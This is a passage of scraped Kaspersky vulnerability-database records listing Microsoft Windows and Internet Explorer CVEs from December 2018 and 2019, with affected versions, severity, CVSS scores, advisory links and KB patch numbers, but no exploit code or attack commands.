2019 (Server Core installation) \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows 10 Version 1803 for x64-based Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 Version 1803 for 32-bit Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 10 Version 1709 for 32-bit Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows 10 Version 1703 for 32-bit Systems \nInternet Explorer 10 \nWindows Server 2012 R2 \nWindows Server 2019\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2018-8611](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8611>) \n[CVE-2018-8477](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8477>) \n[CVE-2018-8619](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8619>) \n[CVE-2018-8643](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8643>) \n[CVE-2018-8641](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8641>) \n[CVE-2018-8596](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8596>) \n[CVE-2018-8514](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8514>) \n[CVE-2018-8639](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8639>) \n[CVE-2018-8595](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8595>) \n[CVE-2018-8621](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8621>) \n[CVE-2018-8622](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8622>) \n[CVE-2018-8625](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8625>) \n[CVE-2018-8631](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8631>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Internet Explorer](<https://threats.kaspersky.com/en/product/Microsoft-Internet-Explorer/>)\n\n### *CVE-IDS*:\n[CVE-2018-8622](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8622>)0.0Unknown \n[CVE-2018-8641](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8641>)0.0Unknown \n[CVE-2018-8639](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8639>)0.0Unknown \n[CVE-2018-8596](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8596>)0.0Unknown \n[CVE-2018-8611](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8611>)0.0Unknown \n[CVE-2018-8621](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8621>)0.0Unknown \n[CVE-2018-8477](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8477>)0.0Unknown \n[CVE-2018-8514](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8514>)0.0Unknown \n[CVE-2018-8595](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8595>)0.0Unknown \n[CVE-2018-8643](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8643>)0.0Unknown \n[CVE-2018-8631](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8631>)0.0Unknown \n[CVE-2018-8625](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8625>)0.0Unknown \n[CVE-2018-8619](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8619>)0.0Unknown\n\n### *KB list*:\n[4471319](<http://support.microsoft.com/kb/4471319>) \n[4471328](<http://support.microsoft.com/kb/4471328>) \n[4471318](<http://support.microsoft.com/kb/4471318>) \n[4471325](<http://support.microsoft.com/kb/4471325>) \n[4470199](<http://support.microsoft.com/kb/4470199>)\n\n### *Microsoft official advisories*:", "edition": 1, "modified": "2020-07-22T00:00:00", "published": "2018-12-11T00:00:00", "id": "KLA11884", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11884", "title": "\r KLA11884Multiple vulnerability in Microsoft Products (ESU) ", "type": "kaspersky", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-02T11:57:14", "bulletinFamily": "info", "cvelist": ["CVE-2019-1458", "CVE-2019-1481", "CVE-2019-1467", "CVE-2019-1488", "CVE-2019-1468", "CVE-2019-1465", "CVE-2019-1478", "CVE-2019-1453", "CVE-2019-1485", "CVE-2019-1480", "CVE-2019-1484", "CVE-2019-1470", "CVE-2019-1474", "CVE-2019-1466"], "description": "### *Detect date*:\n12/10/2019\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Products (Extended Support Update). Malicious users can exploit these vulnerabilities to obtain sensitive information, execute arbitrary code, gain privileges, bypass security restrictions, cause denial of service.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows 10 Version 1903 for 32-bit Systems \nWindows Server, version 1803 (Server Core Installation) \nWindows Server 2019 (Server Core installation) \nWindows 10 Version 1809 for x64-based Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows Server 2012 R2 \nWindows Server 2012 \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 Version 1909 for 32-bit Systems \nWindows 10 for x64-based Systems \nWindows Server 2016 (Server Core installation) \nWindows 8.1 for x64-based systems \nWindows Server 2012 (Server Core installation) \nWindows 10 Version 1709 for x64-based Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 10 Version 1709 for ARM64-based Systems \nWindows 8.1 for 32-bit systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows Server 2016 \nWindows 10 Version 1903 for ARM64-based Systems \nWindows 10 Version 1803 for 32-bit Systems \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows 10 Version 1903 for x64-based Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 1809 for 32-bit Systems \nWindows Server, version 1903 (Server Core installation) \nWindows 10 Version 1803 for x64-based Systems \nWindows RT 8.1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2019 \nWindows Server, version 1909 (Server Core installation) \nWindows 10 Version 1803 for ARM64-based Systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows Server 2012 R2 (Server Core installation) \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 for 32-bit Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1709 for 32-bit Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2019-1470](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1470>) \n[CVE-2019-1466](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1466>) \n[CVE-2019-1474](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1474>) \n[CVE-2019-1465](<https://nvd.nist.gov/vuln/detail/CVE-2019-1465>) \n[CVE-2019-1484](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1484>) \n[CVE-2019-1478](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1478>) \n[CVE-2019-1468](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1468>) \n[CVE-2019-1458](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1458>) \n[CVE-2019-1480](<https://nvd.nist.gov/vuln/detail/CVE-2019-1480>) \n[CVE-2019-1481](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1481>) \n[CVE-2019-1485](<https://nvd.nist.gov/vuln/detail/CVE-2019-1485>) \n[CVE-2019-1488](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1488>) \n[CVE-2019-1453](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1453>) \n[CVE-2019-1467](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1467>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2019-1484](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1484>)0.0Unknown \n[CVE-2019-1488](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1488>)0.0Unknown \n[CVE-2019-1470](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1470>)0.0Unknown \n[CVE-2019-1453](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1453>)0.0Unknown \n[CVE-2019-1465](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1465>)0.0Unknown \n[CVE-2019-1458](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1458>)0.0Unknown \n[CVE-2019-1474](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1474>)0.0Unknown \n[CVE-2019-1481](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1481>)0.0Unknown \n[CVE-2019-1480](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1480>)0.0Unknown \n[CVE-2019-1467](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1467>)0.0Unknown \n[CVE-2019-1468](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1468>)0.0Unknown \n[CVE-2019-1478](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1478>)0.0Unknown \n[CVE-2019-1466](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1466>)0.0Unknown \n[CVE-2019-1485](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1485>)0.0Unknown\n\n### *KB list*:\n[4530695](<http://support.microsoft.com/kb/4530695>) \n[4530734](<http://support.microsoft.com/kb/4530734>) \n[4530719](<http://support.microsoft.com/kb/4530719>) \n[4530692](<http://support.microsoft.com/kb/4530692>) \n[4530677](<http://support.microsoft.com/kb/4530677>)\n\n### *Microsoft official advisories*:", "edition": 1, "modified": "2020-07-22T00:00:00", "published": "2019-12-10T00:00:00", "id": "KLA11862", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11862", "title": "\r KLA11862Multiple vulnerabilities in Microsoft Products (ESU) ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-02T12:03:35", "bulletinFamily": "info", "cvelist": ["CVE-2018-8649", "CVE-2018-8634", "CVE-2018-8621", "CVE-2018-8596", "CVE-2018-8641", "CVE-2018-8612", "CVE-2018-8622", "CVE-2018-8611", "CVE-2018-8595", "CVE-2018-8639", "CVE-2018-8626", "CVE-2018-8599", "CVE-2018-8514", "CVE-2018-8638", "CVE-2018-8637", "CVE-2018-8477"], "description": "### *Detect date*:\n12/11/2018\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to gain privileges, cause denial of service, obtain sensitive information, execute arbitrary code.\n\n### *Affected products*:\nWindows 10 Version 1809 for x64-based Systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows Server 2019 \nWindows Server 2019 (Server Core installation) \nWindows 10 Version 1809 for 32-bit Systems \nWindows Server 2012 (Server Core installation) \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2012 R2 (Server Core installation) \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2012 R2 \nWindows RT 8.1 \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows 8.1 for 32-bit systems \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows 8.1 for x64-based systems \nWindows Server 2012 \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server, version 1803 (Server Core Installation) \nWindows 10 Version 1803 for ARM64-based Systems \nWindows 10 for 32-bit Systems \nWindows 10 Version 1803 for 32-bit Systems \nWindows Server 2016 \nWindows Server 2016 (Server Core installation) \nWindows 10 Version 1709 for 32-bit Systems \nWindows 10 Version 1703 for 32-bit Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 Version 1703 for x64-based Systems \nWindows 10 Version 1803 for x64-based Systems \nWindows 10 for x64-based Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 1709 for ARM64-based Systems \nWindows 10 Version 1709 for x64-based Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2018-8599](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8599>) \n[CVE-2018-8649](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8649>) \n[CVE-2018-8622](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8622>) \n[CVE-2018-8641](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8641>) \n[CVE-2018-8639](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8639>) \n[CVE-2018-8637](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8637>) \n[CVE-2018-8596](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8596>) \n[CVE-2018-8611](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8611>) \n[CVE-2018-8621](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8621>) \n[CVE-2018-8638](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8638>) \n[CVE-2018-8477](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8477>) \n[CVE-2018-8514](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8514>) \n[CVE-2018-8595](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8595>) \n[CVE-2018-8612](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8612>) \n[CVE-2018-8634](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8634>) \n[CVE-2018-8626](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8626>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2018-8599](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8599>)0.0Unknown \n[CVE-2018-8649](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8649>)0.0Unknown \n[CVE-2018-8622](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8622>)0.0Unknown \n[CVE-2018-8641](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8641>)0.0Unknown \n[CVE-2018-8639](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8639>)0.0Unknown \n[CVE-2018-8637](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8637>)0.0Unknown \n[CVE-2018-8596](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8596>)0.0Unknown \n[CVE-2018-8611](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8611>)0.0Unknown \n[CVE-2018-8621](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8621>)0.0Unknown \n[CVE-2018-8638](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8638>)0.0Unknown \n[CVE-2018-8477](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8477>)0.0Unknown \n[CVE-2018-8514](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8514>)0.0Unknown \n[CVE-2018-8595](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8595>)0.0Unknown \n[CVE-2018-8612](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8612>)0.0Unknown \n[CVE-2018-8634](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8634>)0.0Unknown \n[CVE-2018-8626](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8626>)0.0Unknown\n\n### *KB list*:\n[4471329](<http://support.microsoft.com/kb/4471329>) \n[4471323](<http://support.microsoft.com/kb/4471323>) \n[4471324](<http://support.microsoft.com/kb/4471324>) \n[4471327](<http://support.microsoft.com/kb/4471327>) \n[4471321](<http://support.microsoft.com/kb/4471321>) \n[4471332](<http://support.microsoft.com/kb/4471332>) \n[4471320](<http://support.microsoft.com/kb/4471320>) \n[4471322](<http://support.microsoft.com/kb/4471322>) \n[4471326](<http://support.microsoft.com/kb/4471326>) \n[4471330](<http://support.microsoft.com/kb/4471330>)\n\n### *Microsoft official advisories*:\n\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).", "edition": 12, "modified": "2020-07-22T00:00:00", "published": "2018-12-11T00:00:00", "id": "KLA11385", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11385", "title": "\r KLA11385Multiple vulnerabilities in Microsoft Windows ", "type": "kaspersky", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-02T12:00:27", "bulletinFamily": "info", "cvelist": ["CVE-2019-1458", "CVE-2019-1483", "CVE-2019-1469", "CVE-2019-1471", "CVE-2019-1467", "CVE-2019-1488", "CVE-2019-1477", "CVE-2019-1476", "CVE-2019-1468", "CVE-2019-1465", "CVE-2019-1489", "CVE-2019-1453", "CVE-2019-1484", "CVE-2019-1472", "CVE-2019-1470", "CVE-2019-1474", "CVE-2019-1466"], "description": "### *Detect date*:\n12/10/2019\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to execute arbitrary code, obtain sensitive information, bypass security restrictions, gain privileges, cause denial of service.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2019 \nWindows 10 for 32-bit Systems \nWindows Server, version 1803 (Server Core Installation) \nWindows 10 Version 1903 for x64-based Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 10 Version 2004 for ARM64-based Systems \nWindows 10 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows Server 2016 (Server Core installation) \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2012 \nWindows 8.1 for x64-based systems \nWindows 8.1 for 32-bit systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows Server, version 2004 (Server Core installation) \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 Version 1803 for ARM64-based Systems \nWindows Server 2016 \nWindows 10 Version 1709 for x64-based Systems \nWindows RT 8.1 \nWindows 10 Version 1709 for ARM64-based Systems \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows 10 Version 1809 for 32-bit Systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 1903 for 32-bit Systems \nWindows Server 2012 R2 (Server Core installation) \nWindows 10 Version 1909 for 32-bit Systems \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows Server 2019 (Server Core installation) \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows 10 Version 2004 for 32-bit Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nMicrosoft Windows XP Service Pack 3 \nWindows 10 Version 2004 for x64-based Systems \nWindows Server, version 1903 (Server Core installation) \nWindows 10 Version 1903 for ARM64-based Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows Server, version 1909 (Server Core installation) \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows 10 Version 1803 for 32-bit Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows 10 Version 1709 for 32-bit Systems \nWindows Server 2012 R2 \nWindows 10 Version 1803 for x64-based Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2019-1471](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1471>) \n[CVE-2019-1470](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1470>) \n[CVE-2019-1474](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1474>) \n[CVE-2019-1472](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1472>) \n[CVE-2019-1488](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1488>) \n[CVE-2019-1467](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1467>) \n[CVE-2019-1477](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1477>) \n[CVE-2019-1476](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1476>) \n[CVE-2019-1484](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1484>) \n[CVE-2019-1468](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1468>) \n[CVE-2019-1469](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1469>) \n[CVE-2019-1483](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1483>) \n[CVE-2019-1458](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1458>) \n[CVE-2019-1466](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1466>) \n[CVE-2019-1453](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1453>) \n[CVE-2019-1465](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1465>) \n[CVE-2019-1489](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1489>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2019-1483](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1483>)0.0Unknown \n[CVE-2019-1484](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1484>)0.0Unknown \n[CVE-2019-1489](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1489>)0.0Unknown \n[CVE-2019-1488](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1488>)0.0Unknown \n[CVE-2019-1470](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1470>)0.0Unknown \n[CVE-2019-1453](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1453>)0.0Unknown \n[CVE-2019-1465](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1465>)0.0Unknown \n[CVE-2019-1458](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1458>)0.0Unknown \n[CVE-2019-1474](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1474>)0.0Unknown \n[CVE-2019-1472](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1472>)0.0Unknown \n[CVE-2019-1476](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1476>)0.0Unknown \n[CVE-2019-1471](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1471>)0.0Unknown \n[CVE-2019-1467](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1467>)0.0Unknown \n[CVE-2019-1468](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1468>)0.0Unknown \n[CVE-2019-1477](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1477>)0.0Unknown \n[CVE-2019-1469](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1469>)0.0Unknown \n[CVE-2019-1466](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1466>)0.0Unknown\n\n### *KB list*:\n[4530684](<http://support.microsoft.com/kb/4530684>) \n[4530691](<http://support.microsoft.com/kb/4530691>) \n[4530681](<http://support.microsoft.com/kb/4530681>) \n[4530714](<http://support.microsoft.com/kb/4530714>) \n[4530689](<http://support.microsoft.com/kb/4530689>) \n[4530730](<http://support.microsoft.com/kb/4530730>) \n[4530717](<http://support.microsoft.com/kb/4530717>) \n[4530698](<http://support.microsoft.com/kb/4530698>) \n[4530702](<http://support.microsoft.com/kb/4530702>) \n[4530715](<http://support.microsoft.com/kb/4530715>) \n[4565503](<http://support.microsoft.com/kb/4565503>)\n\n### *Microsoft official advisories*:", "edition": 1, "modified": "2020-07-22T00:00:00", "published": "2019-12-10T00:00:00", "id": "KLA11868", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11868", "title": "\r KLA11868Multiple vulnerabilities in Microsoft Windows ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-02T11:59:44", "bulletinFamily": "info", "cvelist": ["CVE-2019-1458", "CVE-2019-1483", "CVE-2019-1469", "CVE-2019-1471", "CVE-2019-1467", "CVE-2019-1488", "CVE-2019-1477", "CVE-2019-1476", "CVE-2019-1468", "CVE-2019-1465", "CVE-2019-1489", "CVE-2019-1453", "CVE-2019-1484", "CVE-2019-1472", "CVE-2019-1470", "CVE-2019-1474", "CVE-2019-1466"], "description": "### *Detect date*:\n12/11/2019\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to gain privileges, execute arbitrary code, obtain sensitive information, bypass security restrictions, cause denial of service.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nMicrosoft Windows XP Service Pack 3 \nWindows 10 Version 1809 for x64-based Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 Version 1803 for x64-based Systems \nWindows 10 Version 1903 for ARM64-based Systems \nWindows 10 for x64-based Systems \nWindows 10 Version 1903 for 32-bit Systems \nWindows 10 Version 1903 for x64-based Systems \nWindows Server 2016 \nWindows Server, version 1803 (Server Core Installation) \nWindows 10 Version 1909 for 32-bit Systems \nWindows 10 Version 1809 for 32-bit Systems \nWindows Server, version 1903 (Server Core installation) \nWindows 10 Version 1709 for ARM64-based Systems \nWindows Server 2012 \nWindows Server 2012 R2 (Server Core installation) \nWindows Server, version 1909 (Server Core installation) \nWindows RT 8.1 \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2012 (Server Core installation) \nWindows Server 2019 (Server Core installation) \nWindows Server 2019 \nWindows 10 Version 1909 for x64-based Systems \nWindows 10 Version 1803 for 32-bit Systems \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 10 Version 1709 for x64-based Systems \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows Server 2012 R2 \nWindows 10 Version 1709 for 32-bit Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 10 for 32-bit Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 